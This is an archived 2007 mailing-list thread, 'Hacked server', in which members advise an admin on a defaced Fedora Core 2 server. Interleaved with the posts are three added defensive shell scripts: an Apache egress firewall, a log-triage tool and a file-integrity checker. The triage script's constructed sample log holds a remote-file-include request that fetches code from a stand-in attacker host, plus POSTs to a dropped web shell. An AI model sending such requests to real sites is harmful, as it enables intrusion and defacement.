Re: Hacked server

2007-04-08 Thread Ilya Konstantinov

On 4/8/07, Orr Dunkelman [EMAIL PROTECTED] wrote:


You will also need to install everything from scratch (and I suggest you
init. your bios as well).



Flashing your BIOS for no real need (and the attack you're talking about is
purely theoretical) is calling for trouble. While it's fun to play the "how
can you totally 0wn a server?" mental game, let's stick to what's really
done in real-life attacks.


Try running them (including the web server itself) in chroot.


Alternatively, at least consider limiting Apache a bit:
1) Run it with an SELinux policy (FC3 and upwards support SELinux; not sure
about FC2)
2) Limit, with iptables uid-owner/gid-owner rules, the network sites which
Apache can initiate a connection to. While this will add a maintenance
overhead for web apps which pull data from remote servers, it'll also break
many common attacks, e.g.:
- some pre-made attack scripts rely on making, say, your broken PHP webapp,
download the full-fledged backdoor program from a remote server owned by the
attacker
- one reason to attack might be to set up a spam zombie; By refusing
outgoing traffic, it couldn't contact port 25 on other machines.

Depending on your web apps, those limitations might be an unacceptable
overhead. Or you might flex them a bit, e.g. choose to always allow port 80
but not other ports. Also, they don't aim to give hermetic security, just to
cripple your environment enough to frustrate an attacker or make your
machine useless for his needs.
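The owner-match egress restriction described above, written out as an added example (not code from the thread). It assumes the Apache workers run under one numeric uid (48, the `apache` user on Fedora/RHEL; set APACHE_UID otherwise) and that the web apps only need outbound TCP to the listed ports plus DNS. The rules are printed for review and applied only when asked, because a mistake here cuts the server's own web apps off the network.

```shell
#!/bin/sh
# Egress allow-list for the Apache worker uid, using iptables' owner match.
# Added example, not from the thread. Assumptions: Apache workers run as
# one numeric uid (APACHE_UID, 48 = "apache" on Fedora/RHEL), and the web
# apps only need outbound TCP to ALLOWED_PORTS plus DNS.

APACHE_UID=${APACHE_UID:-48}
ALLOWED_PORTS=${ALLOWED_PORTS:-80 443}

# Print the iptables commands (one per line) that hang a private chain off
# OUTPUT for packets owned by $1 and allow only what $2 lists.
#   $1 = numeric uid of the web server user
#   $2 = space-separated TCP ports Apache may open connections to
gen_apache_egress_rules() {
    uid=$1
    ports=$2
    # (re)create the chain and route the uid's traffic into it
    echo "iptables -N APACHE_OUT 2>/dev/null || iptables -F APACHE_OUT"
    echo "iptables -D OUTPUT -m owner --uid-owner $uid -j APACHE_OUT 2>/dev/null || true"
    echo "iptables -A OUTPUT -m owner --uid-owner $uid -j APACHE_OUT"
    # replies to clients belong to connections that were opened inbound, so
    # they pass; a NEW outbound connection never reaches ESTABLISHED
    echo "iptables -A APACHE_OUT -m state --state ESTABLISHED,RELATED -j ACCEPT"
    echo "iptables -A APACHE_OUT -o lo -j ACCEPT"
    echo "iptables -A APACHE_OUT -p udp --dport 53 -j ACCEPT"
    for p in $ports; do
        echo "iptables -A APACHE_OUT -p tcp --dport $p -m state --state NEW -j ACCEPT"
    done
    # everything else (port 25 included, so no spam zombie; and no fetching a
    # second-stage backdoor from the attacker's host): log, then reject
    echo "iptables -A APACHE_OUT -m limit --limit 5/min -j LOG --log-prefix \"apache-egress: \""
    echo "iptables -A APACHE_OUT -j REJECT --reject-with icmp-port-unreachable"
}

# Usage: ./apache-egress.sh         print the rules for review
#        ./apache-egress.sh apply   feed them to iptables (needs root)
case "${1:-print}" in
    apply) gen_apache_egress_rules "$APACHE_UID" "$ALLOWED_PORTS" | sh -e ;;
    print) gen_apache_egress_rules "$APACHE_UID" "$ALLOWED_PORTS" ;;
    *)     echo "usage: $0 [print|apply]" >&2; exit 2 ;;
esac
```

The REJECT at the end is what breaks the "make the broken PHP app fetch the real backdoor" step and the spam-zombie use: a new connection to any port not in the list fails immediately, and the LOG line in front of it tells you which web app tried. On current kernels `-m conntrack --ctstate` is the preferred spelling of the state match; `-m state` still loads as an alias.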


Re: Hacked server

2007-04-08 Thread Maxim Veksler

On 4/8/07, Hetz Ben Hamo [EMAIL PROTECTED] wrote:

You could do few things:

2. Have some logs emailed to you from the server on a daily basis
(crontab). By default, Redhat/CentOS/Fedora does this automatically,
but you can enhance it to pack a few log files and email them to
you as a .tar.bz2, for example. That way you could check what's going on
to see who entered when etc. (logs like ssh, httpd, sendmail).
Usually when you compress text files, they become small, so the email
wouldn't be really big.


That is impractical advice. No one has time to go over the logs of every
service on a daily basis; the only way your logs will prove useful that way
is *after* the break-in.
You should be looking at logwatch.


3. Make sure your iptables/firewall settings only let in what is specifically
needed and nothing else. nmap is your friend to check, along
with stuff like SAINT etc. If you don't know firewall settings well,
just ask here. I'm sure someone would happily assist you with it.


Also, for user friendly firewall manipulation - http://www.fwbuilder.org/


4. have a cron script that will backup your web server stuff nightly.
If you don't have a tape backup or spare space for backup, then pack
the essential parts and use the script to email it to you (GMail
account can hold almost 3 gigs, so you can save the backup there)


dirvish.org is a gift from guru(s).


Hetz



Maxim.

--
Cheers,
Maxim Veksler

Free as in Freedom - Do u GNU ?

=
To unsubscribe, send mail to [EMAIL PROTECTED] with
the word unsubscribe in the message body, e.g., run the command
echo unsubscribe | mail [EMAIL PROTECTED]



Re: Hacked server

2007-04-08 Thread Baruch Shpirer
1. run it behind a decent firewall (even pf/iptables logs should give you
some idea about who's accessing your computer and using which service)

2. don't run anything as root

3. run chrooted envs if possible

4. reinstall using a more updated system and don't install anything
you don't need, slim it down

5. configure firewall and service ACLs to allow remote access (SSH) or
service level (BIND) access from known IPs/networks

6. honeypots and monitoring scripts

7. rootkits

8. an IDS can come in handy to alert you on hazardous actions on the server
(snort?)

9. hide all information about application names and versions; same goes
for the OS. Search for OS hardening guides


On Sun, April 8, 2007 00:33, Ori Idan wrote:
 A server I managed was hacked by a Libyan hacker.
 The only thing he did was changing the index.html of some web sites.

 The server is based on fedora core 2
 running:
 httpd sendmail bind proftp (through xinetd) ssh

 Any ideas how he could have done it?
 What should I do to prevent such hacks in the future?

 --
 Ori Idan


Best regards

Baruch Shpirer
http://www.shpirer.com

Paranoids are people too, they have their own problems. It's easy to
criticize, but if everybody hated you, you'd be paranoid too.
D. J. Hicks




Re: Hacked server

2007-04-08 Thread Oron Peled
On Sunday, 8 April 2007 01:16, Amos Shapira wrote:
 Sticking to supported versions is rule number one in production networks
 (and plan ahead to switch to a later version well before the current one you
 use gets EOL'ed).

Correct. Ori used FC2, while FC4 has already been EOL for many months.

 As far as I'm aware FC is just a beta for RedHat and I'm not even
 sure they promise to issue security patches for it.

That's FUD. RedHat sponsors Fedora, but the project issues its own
releases and patches. 

 By supported I mean that the distro vendor promises to track the
 relevant security vulnerabilities in the included software and issue
 patched packages in a timely manner.

Fedora does this promptly like any other free software distro
(yes, I am a Fedora user as you can feel ;-)

 (Again - I'm not quite familiar with FC or RH but Debian makes all these
 suggestions uber easy).

I run 'yum update' daily (you can do it via cron of course, but I
prefer to do it manually).

For production server you should reconsider your distribution of choice:
Fedora is a fast paced distro like Debian testing, you get most
bleeding edge software (that's why I stick with it) but you pay
in almost daily updates and a short life cycle -- new release
every 6 months and good maintenance of only 1.5 releases (~1 year).

If you aim at a free distribution with long term updates then you
may either switch to CentOS (a RedHat clone, so your learning
curve should be easier), or switch to Debian stable (h...
there's no point installing Sarge now, and Etch is due RSN(tm)).

-- 
Oron Peled Voice/Fax: +972-4-8228492
[EMAIL PROTECTED]  http://www.actcom.co.il/~oron
ICQ UIN: 16527398

Software is like Entropy: it's hard to grasp, weighs nothing and obeys
the Second Law of Thermodynamics, i.e. it always increases 
-- Norman Augustine 




Re: Hacked server

2007-04-08 Thread Shachar Shemesh
Oron Peled wrote:
 Fedora is a fast paced distro like Debian testing
I'm assuming you meant Debian Unstable

Shachar

-- 
Shachar Shemesh
Lingnu Open Source Consulting ltd.
Have you backed up today's work? http://www.lingnu.com/backup.html





Re: Hacked server

2007-04-08 Thread Oren Held




I disagree, Debian Unstable (Sid) is an ever-updating, bleeding-edge
distro: *tends to bring the latest version of each software*, while
Fedora doesn't.

For example, FC6 has Firefox 1.5, and 2.0 will never be there, only in
FC7.

Debian Testing is the next Debian Stable, like FC is the next RHEL.

 - Oren

Shachar Shemesh wrote:

 Oron Peled wrote:
  Fedora is a fast paced distro like Debian testing

 I'm assuming you meant "Debian Unstable"

 Shachar





Re: Hacked server

2007-04-08 Thread Oron Peled
On Sunday, 8 April 2007 13:59, Shachar Shemesh wrote:
 Oron Peled wrote:
  Fedora is a fast paced distro like Debian testing
 I'm assuming you meant Debian Unstable

No, unless I misunderstood the Debian process.

In Fedora untested packages first go to the Rawhide
repositories (which I think are the equivalent of Debian Unstable).
Only later do they filter into the official Fedora repositories.

Fedora does not have an equivalent to Debian Stable (because that's
what RedHat is supposed to be when you pay them... ;-)

BTW, as the Fedora project matures it naturally encounters the
same challenges as any big community based distro. In that sense
I see a lot of learning and copying from Debian (which is a good
thing).

Regretfully, it's not common enough and there are plenty of cases
when the wrong wheels are poorly reinvented -- my (un)favorite is yum
instead of using apt4rpm. Well, at least the official repositories are
both yum/apt capable since FC5.

Bye,

-- 
Oron Peled Voice/Fax: +972-4-8228492
[EMAIL PROTECTED]  http://www.actcom.co.il/~oron
ICQ UIN: 16527398

Those who do not understand Unix are condemned to reinvent it, poorly.
 (H. Spencer)




Hacked server

2007-04-07 Thread Ori Idan

A server I managed was hacked by a Libyan hacker.
The only thing he did was changing the index.html of some web sites.

The server is based on fedora core 2
running:
httpd
sendmail
bind
proftp (through xinetd)
ssh

Any ideas how he could have done it?
What should I do to prevent such hacks in the future?

--
Ori Idan


Re: Hacked server

2007-04-07 Thread Lior Kaplan
Ori Idan wrote:
 A server I managed was hacked by a Libyan hacker.
 The only thing he did was changing the index.html of some web sites.
 
 The server is based on fedora core 2

Didn't Fedora stop releasing security updates for this version a long
time ago?

-- 

Lior Kaplan
[EMAIL PROTECTED]
http://www.Guides.co.il




Re: Hacked server

2007-04-07 Thread Josh Zlatin-Amishav

On Sun, 8 Apr 2007, Ori Idan wrote:


A server I managed was hacked by a Libyan hacker.
The only thing he did was changing the index.html of some web sites.

The server is based on fedora core 2
running:
httpd
sendmail
bind
proftp (through xinetd)
ssh

Any ideas how he could have done it?


The httpd log files should have some clues. Without knowing the
versions of software you're running it's hard to say if there are known
vulns in the software you're running, let alone unpublished flaws. What
kind of web applications are running?


What should I do to prevent such hacks in the future?


There are lots of things you can do, like keep software up to date,
remove unneeded services, audit web applications for flaws (though I am
kind of partial to the last one ;)

--
 - Josh

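Josh's point that the httpd logs usually hold the clues, and ik's point further down the thread that the 404s show what the visitor was looking for, carried out as an added example (not code from the thread) of a first-pass triage of an Apache combined-format access_log. The log lines are constructed for the example and the addresses are documentation ranges; the field positions assume the default combined LogFormat.

```shell
#!/bin/sh
# First-pass triage of an Apache "combined" access_log after a defacement.
# Added example, not from the thread. The sample log below is constructed;
# point LOG at the real file instead. Assumes the default combined format:
# $1 client, $4 timestamp, $6 method (with leading quote), $7 path, $9 status.

# Clients that POSTed to PHP scripts, with the script: an uploaded web shell
# or an upload form is driven by exactly this kind of request.
php_posters() {   # $1 = log file
    awk '$6 == "\"POST" && $7 ~ /\.php/ { print $1, $7 }' "$1" | sort | uniq -c | sort -rn
}

# Everything one client did, in order: the 404s from its scan, the request
# that finally worked, and what it did afterwards.
client_history() {   # $1 = log file, $2 = client address
    awk -v ip="$2" '$1 == ip { print $4, $6, $7, $9 }' "$1"
}

# Query-string parameters carrying a URL: the remote-file-include pattern by
# which a broken PHP app is made to fetch and run code from another host.
remote_includes() {   # $1 = log file
    grep -E '"(GET|POST) [^ ]*\?[^ ]*=(https?|ftp)://' "$1" | awk '{ print $1, $7 }'
}

# Constructed sample (RFC 5737 documentation addresses); rm it when done.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
198.51.100.20 - - [07/Apr/2007:20:58:11 +0300] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Apr/2007:21:14:02 +0300] "GET /forum/admin/config.php HTTP/1.1" 404 294 "-" "libwww-perl/5.805"
203.0.113.7 - - [07/Apr/2007:21:14:03 +0300] "GET /phpbb/admin/config.php HTTP/1.1" 404 294 "-" "libwww-perl/5.805"
203.0.113.7 - - [07/Apr/2007:21:14:05 +0300] "GET /gallery/index.php?page=http://203.0.113.7/c.txt? HTTP/1.1" 200 2210 "-" "libwww-perl/5.805"
203.0.113.7 - - [07/Apr/2007:21:14:09 +0300] "POST /gallery/images/x.php HTTP/1.1" 200 88 "-" "libwww-perl/5.805"
203.0.113.7 - - [07/Apr/2007:21:14:40 +0300] "POST /gallery/images/x.php HTTP/1.1" 200 61 "-" "libwww-perl/5.805"
198.51.100.20 - - [07/Apr/2007:21:30:44 +0300] "GET /index.html HTTP/1.1" 200 412 "-" "Mozilla/5.0"
EOF

LOG=${LOG:-$SAMPLE}
echo "== clients POSTing to PHP scripts (count, client, script)"
php_posters "$LOG"
echo "== remote-include attempts (client, request)"
remote_includes "$LOG"
for ip in $(php_posters "$LOG" | awk '{ print $2 }' | sort -u); do
    echo "== full history of $ip"
    client_history "$LOG" "$ip"
done
```

Work on a copy of the log taken off the box: anyone who got a shell as the web server user may also have been able to edit the log the web server writes. The script-style User-Agent, the run of 404s against admin paths, a 200 on a request with a URL in its query string, and POSTs to a .php file sitting in an images directory are the sequence to look for; the last item is the "php shell on port 80" that a port scan will not show.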



Re: Hacked server

2007-04-07 Thread ik

I suggest that you scan for open ports on your web site
(the full port range), to see if that person has an open shell on
your account.

Regardless of that, please look for known vulnerabilities in the
versions of every server on the machine, and also, if the server runs
any dynamic web apps, check that they do not have any problems
(404 and any other error messages can give you a clue as to what
they were looking for).

Anyway, I recommend that you install (from a clean install rather than
an update, because you do not know everything the attackers
did) a newer version, such as FC 6... or something better, such as
Debian ;)

Ido

On 4/8/07, Ori Idan [EMAIL PROTECTED] wrote:

A server I managed was hacked by a Libyan hacker.
The only thing he did was changing the index.html of some web sites.

The server is based on fedora core 2
running:
httpd
sendmail
bind
proftp (through xinetd)
ssh

Any ideas how he could have done it?
What should I do to prevent such hacks in the future?

--
Ori Idan





--
http://ik.homelinux.org/




Re: Hacked server

2007-04-07 Thread Oren Held
Indeed a remote exploit in the services is possible, and of course each 
service can have a remote exploit...


However, I'd be trying to eliminate the less-uber-cool-hacker possibilities:
a. Bad local user (Bad user! spank him..)
b. SSH remote login using a weak password which was just guessed 
(test123. Bad user again!).


Also try to check for root kits...

- Oren

Ori Idan wrote:

A server I managed was hacked by a Libyan hacker.
The only thing he did was changing the index.html of some web sites.

The server is based on fedora core 2
running:
httpd
sendmail
bind
proftp (through xinetd)
ssh

Any ideas how he could have done it?
What should I do to prevent such hacks in the future?

--
Ori Idan







Re: Hacked server

2007-04-07 Thread Hetz Ben Hamo

You could do few things:

1. apt-get dist-upgrade (or yum upgrade), or better - move to a stable
distribution like CentOS. That way you'll have security fixes for at
least 5 years. DO NOT use Fedora on any server which offers services
outside.
2. Have some logs emailed to you from the server on a daily basis
(crontab). By default, Redhat/CentOS/Fedora does this automatically,
but you can enhance it to pack a few log files and email them to
you as a .tar.bz2, for example. That way you could check what's going on
to see who entered when etc. (logs like ssh, httpd, sendmail).
Usually when you compress text files, they become small, so the email
wouldn't be really big.
3. Make sure your iptables/firewall settings only let in what is specifically
needed and nothing else. nmap is your friend to check, along
with stuff like SAINT etc. If you don't know firewall settings well,
just ask here. I'm sure someone would happily assist you with it.
4. have a cron script that will backup your web server stuff nightly.
If you don't have a tape backup or spare space for backup, then pack
the essential parts and use the script to email it to you (GMail
account can hold almost 3 gigs, so you can save the backup there)
5. You can use applications like TripWire to detect if something
changed, or you can simply do a simple MD5 check for your static
pages, and if something goes wrong, it could email/SMS/send-a-pigeon
to notify you :)

Hope this helps,
Hetz

On 4/8/07, Ori Idan [EMAIL PROTECTED] wrote:

A server I managed was hacked by a Libyan hacker.
The only thing he did was changing the index.html of some web sites.

The server is based on fedora core 2
running:
httpd
sendmail
bind
proftp (through xinetd)
ssh

Any ideas how he could have done it?
What should I do to prevent such hacks in the future?

--
Ori Idan





--
Skepticism is the lazy person's default position.
Visit my blog (hebrew) for things that (sometimes) matter:
http://wp.dad-answers.com

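Item 5 above, the simple hash check over the static pages, carried through as an added example (not code from the thread). It uses sha256sum rather than MD5 (same coreutils package, without MD5's known collision weaknesses); the web root and baseline paths are assumptions, and the baseline has to live somewhere the web server's uid cannot write, ideally off the box like the emailed logs, or whoever defaced the page simply rehashes afterwards.

```shell
#!/bin/sh
# Baseline-and-verify integrity check for a web root (the "simple MD5
# check" idea, done with sha256sum). Added example, not from the thread.
# Assumed paths: WEBROOT, and a BASELINE file kept where the web server's
# uid cannot write it.

WEBROOT=${WEBROOT:-/var/www/html}
BASELINE=${BASELINE:-/var/lib/webcheck/baseline.sha256}

# Hash every regular file under $1 into $2, one "<sha256>  ./path" per line,
# sorted so two baselines of the same tree compare byte for byte.
make_baseline() {
    ( cd "$1" && find . -type f -print0 | sort -z | xargs -0 -r sha256sum ) > "$2"
}

# Rehash $1 and compare with baseline $2. Prints one CHANGED/NEW/MISSING
# line per difference; returns 1 if there were any, 0 if the tree is intact,
# so a cron job can alert with a plain "|| mail ...".
verify_baseline() {
    current=$(mktemp)
    make_baseline "$1" "$current"
    # sha256sum output is 64 hex chars, two spaces, then the path; take the
    # path with substr so file names containing spaces survive intact.
    diffs=$(awk '
        NR == FNR { base[substr($0, 67)] = substr($0, 1, 64); next }
        {
            f = substr($0, 67); h = substr($0, 1, 64)
            if (!(f in base))      print "NEW " f
            else if (base[f] != h) print "CHANGED " f
            delete base[f]
        }
        END { for (f in base) print "MISSING " f }
    ' "$2" "$current")
    rm -f "$current"
    [ -z "$diffs" ] && return 0
    printf '%s\n' "$diffs"
    return 1
}

# Usage: webcheck baseline   after every legitimate deploy
#        webcheck verify     from cron; non-zero exit means the tree changed
case "${1:-demo}" in
    baseline) make_baseline "$WEBROOT" "$BASELINE" ;;
    verify)   verify_baseline "$WEBROOT" "$BASELINE" ;;
    demo)
        # self-demonstration on a constructed tree: baseline, deface, verify
        site=$(mktemp -d); base=$(mktemp)
        mkdir -p "$site/img"
        printf '<h1>welcome</h1>\n' > "$site/index.html"
        printf 'GIF89a\n'           > "$site/img/logo.gif"
        make_baseline "$site" "$base"
        verify_baseline "$site" "$base" && echo "clean tree: no differences"
        printf '<h1>defaced</h1>\n' > "$site/index.html"
        printf 'dropped file\n'     > "$site/img/x.php"
        verify_baseline "$site" "$base" || echo "exit status $?: tree differs"
        rm -rf "$site" "$base"
        ;;
esac
```

Run `baseline` again after each legitimate content change, otherwise every deploy looks like a defacement; and treat a NEW .php file in an upload or images directory as the more urgent finding than the CHANGED index.html, since that is where the shell that made the change usually sits.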



Re: Hacked server

2007-04-07 Thread Amos Shapira

On 08/04/07, Josh Zlatin-Amishav [EMAIL PROTECTED] wrote:


On Sun, 8 Apr 2007, Ori Idan wrote:
 What should I do to prevent such hacks in the future?

There are lots of things you can do, like keep software up to date,
remove unneeded services, audit web applications for flaws (though I am
kind of partial to the last one ;)



Sticking to supported versions is rule number one in production networks
(and plan ahead to switch to a later version well before the current one you
use gets EOL'ed). As far as I'm aware FC is just a beta for RedHat and I'm
not even sure they promise to issue security patches for it. By supported
I mean that the distro vendor promises to track the relevant security
vulnerabilities in the included software and issue patched packages in a
timely manner.

Keeping services jailed would help too (even a simple chroot could help
here) and generally segregated - minimizing amount of code running as root,
possibly running web apps in their own user id, having firewalls on the
server in addition to the network firewalls.

Preparing to be able to re-build the machine from scratch (not just backups,
but an automatic way to install the OS, all necessary packages and
configuration files) would also help you just re-install a compromised
system - because you can never know what easter egg your friendly
neighborhood hacker has left behind.

(Again - I'm not quite familiar with FC or RH but Debian makes all these
suggestions uber easy).

Lots more, depending on particular setup.

--Amos


Re: Hacked server

2007-04-07 Thread Josh Zlatin-Amishav

On Sun, 8 Apr 2007, ik wrote:


I suggest, that you should scan for full open ports on your web site
(all the port range), to see if that person have an open shell on
your account.


Good advice, though the (possible) open shell might just be running on port
80/443 (i.e. a php shell) which is already open and behind a firewall.

--
 - Josh




Re: Hacked server

2007-04-07 Thread Amos Shapira

On 08/04/07, Josh Zlatin-Amishav [EMAIL PROTECTED] wrote:


On Sun, 8 Apr 2007, ik wrote:

 I suggest, that you should scan for full open ports on your web site
 (all the port range), to see if that person have an open shell on
 your account.

Good advice, though the (possible) open shell might just be running on
port
80/443 (i.e. a php shell) which is already open and behind a firewall.



IMHO, if at all possible he should wipe the entire disk and re-install the
system (including the boot record and stuff outside the filesystem address
range). Short of that he will always be worried that there is yet another
present left behind by the cracker.

I've been through such a situation many years ago. With a very low budget,
everything was hosted on the same box, and with the managers too cheap to buy
a separate firewall machine we kept being cracked by a script kiddie, and I
didn't know where to start patching the holes he exploited (and probably new
ones he opened for himself). Without being able to re-install the system he
just kept coming in despite all the cleanups.

These days it's a matter of "how much?" $300 and a day's work to put up an
extra temporary server while you re-install the main one? Most desktops are
strong enough to host web sites so you might not even have to buy dedicated
server hardware.

--Amos


Re: Hacked server

2007-04-07 Thread Ariel Biener
On Sunday, 8 April 2007 00:33, Ori Idan wrote:
 A server I managed was hacked by a Libyan hacker.
 The only thing he did was changing the index.html of some web sites.

 The server is based on fedora core 2
 running:
 httpd
 sendmail
 bind
 proftp (through xinetd)
 ssh

 Any ideas how he could have done it?

Based on your description, and on Internet statistics, I'd say:

1. Flawed PHP based application or code (photo album, forum, etc)
2. Flawed flash application (chat server)
3. Buggy apache.

 What should I do to prevent such hacks in the future?

Run a supported release of OS. Be careful what webapps you run
on your web server. Keep them up-to-date. Try running them
(including the web server itself) in chroot. While this won't help
if your app is broken, at least the attacker will be locked into
a chrooted environment.

Audit your server, run tripwire and look at the daily logs for binaries
or files that were changed.

Read online and printed material about basic system administration
and security practices. Based on your questions, you need an overall
understanding of how to run a system in a secure manner.

--Ariel
 --
 Ariel Biener
 *.il EFnet Admin
 PGP: http://www.tau.ac.il/~ariel/pgp.html




Re: Hacked server

2007-04-07 Thread Orr Dunkelman

sendmail & bind are also bad for your mental health.
Consider normal alternatives, or if you want to make sure no one is hacking
your system through them, switch to qmail and djbdns.

You will also need to install everything from scratch (and I suggest you
init. your BIOS as well).

If you want to do real forensics, you'll need to freeze the system, and
stop touching anything there. Not sure it'll help you a lot (you already
know that the guy is from Libya, and I'm not sure you can ask the Libyan
police to arrest him for that).

just my 2 euro cents,

Orr.

On 4/7/07, Ori Idan [EMAIL PROTECTED] wrote:


A server I managed was hacked by a Libyan hacker.
The only thing he did was changing the index.html of some web sites.

The server is based on fedora core 2
running:
httpd
sendmail
bind
proftp (through xinetd)
ssh

Any ideas how he could have done it?
What should I do to prevent such hacks in the future?

--
Ori Idan





--
Orr Dunkelman,
[EMAIL PROTECTED], [EMAIL PROTECTED]

Any human thing supposed to be complete, must for that reason infallibly
be faulty -- Herman Melville, Moby Dick.

Spammers: http://vipe.technion.ac.il/~orrd/spam.html
GPG fingerprint: C2D5 C6D6 9A24 9A95 C5B3  2023 6CAB 4A7C B73F D0AA
(This key will never sign Emails, only other PGP keys.)


Re: Hacked server

2007-04-07 Thread Boaz Rymland
Adding to what's been said so far (and if repeating please consider it 
as double emphasis :-) I'd recommend:


1. Do not run anything not needed on the server. Make sure to look not 
only at the system services level but at the service level itself. E.g.: run 
on the web server only what you need on it. I had a server hacked 
through some exploit in the OpenWebMail application, revealed two weeks 
before the break-in. This web mail application was only being tested at the 
time, with no plans for implementation, but I still left it on the 
system... If you do not need PHP, for example, remove/disable it 
altogether. If you do, carefully refer to security guides on the net. 
Yes, it's all quite time consuming.



2. You must subscribe yourself to mailing lists dealing with security 
issues to get advisories on time (see (1) above for the reason). The 
minimum is from your distro (every distro has such) but I wouldn't 
settle for this only but subscribe also to mailing lists about the 
services on your system (again, system level services and more granular 
services like web applications and other stuff you have on this server).



Boaz.


Ori Idan wrote:

A server I managed was hacked by a Libyan hacker.
The only thing he did was changing the index.html of some web sites.

The server is based on fedora core 2
running:
httpd
sendmail
bind
proftp (through xinetd)
ssh

Any ideas how he could have done it?
What should I do to prevent such hacks in the future?

--
Ori Idan


